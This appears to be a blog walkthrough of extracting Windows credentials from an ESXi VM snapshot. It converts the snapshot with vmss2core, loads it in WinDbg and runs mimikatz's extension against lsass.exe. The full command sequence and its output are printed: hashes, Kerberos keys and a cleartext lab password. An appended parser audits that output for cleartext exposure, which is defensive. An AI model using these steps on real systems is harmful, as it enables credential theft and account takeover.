Target VM: win7x86 (Build 7600), running on ESXi 5.0
Processing (analysis) VM: Windows 7 SP1 x86 Build 7601
| Name | Version |
|---|---|
| vmss2core-Linux64 | January 13, 2017 v1.0.1 |
| WinDbg | 6.11.0001.404 x86 |
| WinSCP | 5.9.3 Build 7136 |
| mimilib.dll | win32 from mimikatz_trunk 2.1 20160229 |
/vmfs/volumes/589af095-50718614-d536-005056881c2e/win7x86 # ./vmss2core-Linux64 -W7600 "win7x86-bfdbf0ed.vmss"
vmss2core version 8437677 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.
Win32: found DDB at PA 0x2779be8
Win32: MmPfnDatabase=0x827b9700
Win32: PsLoadedModuleList=0x82799810
Win32: PsActiveProcessHead=0x82791e98
Win32: KiBugcheckData=0x827b1a00
Win32: KernBase=0x82651000
Win32: NtBuildLab=0x826a1068
CoreDumpScanWin32: MinorVersion set to 7600
... 10 MBs written.
... 20 MBs written.
... 30 MBs written.
...
... 1010 MBs written.
... 1020 MBs written.
Finished writing core.
kd> .sympath SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbols
kd> .reload
Loading Kernel Symbols
...................................................
Loading User Symbols
...................................................
Loading unloaded module list
......
*** ERROR: Symbol file could not be found. Defaulted to export symbols for vmtools.dll -
kd> !process 0 0 lsass.exe
PROCESS 85d37a68 SessionId: 0 Cid: 0204 Peb: 7ffd8000 ParentCid: 0194
DirBase: 3eab20e0 ObjectTable: 96371e60 HandleCount: 564.
Image: lsass.exe
kd> .process /r /p 85d37a68
Implicit process is now 85d37a68
Loading User Symbols
..............................................................
kd> .load C:\vmss\mimilib.dll
.#####. mimikatz 2.0 alpha (x86) built on Feb 29 2016 03:03:51
.## ^ ##. "A La Vie, A L'Amour" - Windows build 7600
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:
Compatibility prefered key:
SekurLSA
========
Authentication Id : 0 ; 618511 (00000000:0009700f)
Session : Interactive from 1
User Name : WIN7X86EN
Domain : WIN7X86EN-PC
Logon Server : WIN7X86EN-PC
Logon Time : 2/24/2017 1:19:20 AM
SID : S-1-5-21-2794451615-1102251730-2481481344-1000
msv :
[00000003] Primary
* Username : WIN7X86EN
* Domain : WIN7X86EN-PC
* LM : 16a5d217f7c9c7befdcfc2afb2d1be34
* NTLM : a91a49a72e7cf292cdad1bffdead9fd3
* SHA1 : e4496b25c5afb22a92d28dadecb7d5873e920b6e
tspkg :
* Username : WIN7X86EN
* Domain : WIN7X86EN-PC
* Password : mypassword
wdigest :
* Username : WIN7X86EN
* Domain : WIN7X86EN-PC
* Password : mypassword
kerberos :
* Username : WIN7X86EN
* Domain : WIN7X86EN-PC
* Password : mypassword
* Key List
aes256_hmac <no size, buffer is incorrect>
aes128_hmac <no size, buffer is incorrect>
rc4_hmac_nt a91a49a72e7cf292cdad1bffdead9fd3
rc4_hmac_old a91a49a72e7cf292cdad1bffdead9fd3
rc4_md4 a91a49a72e7cf292cdad1bffdead9fd3
rc4_hmac_nt_exp a91a49a72e7cf292cdad1bffdead9fd3
rc4_hmac_old_exp a91a49a72e7cf292cdad1bffdead9fd3
ssp :
masterkey :
credman :
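The SekurLSA listing above shows the security-relevant finding of this exercise: on this unpatched Windows 7 build, the tspkg, wdigest and kerberos providers hold the logon password in cleartext, while msv holds only hashes. The following parser is an added example (not part of the page or of mimikatz) that reads such a listing and reports which providers exposed a cleartext password, so an audit of a snapshot can be reduced to a short finding; the sample text is constructed from the output above with the password replaced by a placeholder.

```python
"""Triage a mimikatz SekurLSA listing: which providers exposed plaintext.

Added example, not the page's or mimikatz's own code. It parses the
one-session text layout shown above ("provider :" headers followed by
"* Field : value" lines) and flags providers that held a Password field.
"""
import re

# Constructed from the page's output; the real password is replaced.
SAMPLE = """\
Authentication Id : 0 ; 618511 (00000000:0009700f)
Session : Interactive from 1
User Name : WIN7X86EN
Domain : WIN7X86EN-PC
msv :
[00000003] Primary
* Username : WIN7X86EN
* NTLM : a91a49a72e7cf292cdad1bffdead9fd3
tspkg :
* Username : WIN7X86EN
* Password : <placeholder>
wdigest :
* Username : WIN7X86EN
* Password : <placeholder>
kerberos :
* Username : WIN7X86EN
* Password : <placeholder>
ssp :
credman :
"""

PROVIDER_RE = re.compile(r"^(\w+) :\s*$")          # e.g. "wdigest :"
FIELD_RE = re.compile(r"^\*\s*(\w+)\s*:\s*(.*)$")  # e.g. "* NTLM : <hash>"

def parse_sekurlsa(text):
    """Return {provider: {field: value}} for one logon-session block."""
    providers, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = PROVIDER_RE.match(line)
        if m:                      # new provider section starts
            current = m.group(1)
            providers[current] = {}
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            providers[current][m.group(1)] = m.group(2)
    return providers

def plaintext_exposure(providers):
    """Providers holding a cleartext password: the ones hardening must empty."""
    return sorted(p for p, f in providers.items()
                  if f.get("Password") not in (None, "(null)"))
```

Running `plaintext_exposure(parse_sekurlsa(SAMPLE))` on the sample returns `['kerberos', 'tspkg', 'wdigest']`; after the cleartext providers are disabled on a host, the same audit of a fresh snapshot should return an empty list.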
Mimikatz Against Virtual Machine Memory Part 1
Mimikatz Against Virtual Machine Memory Part 2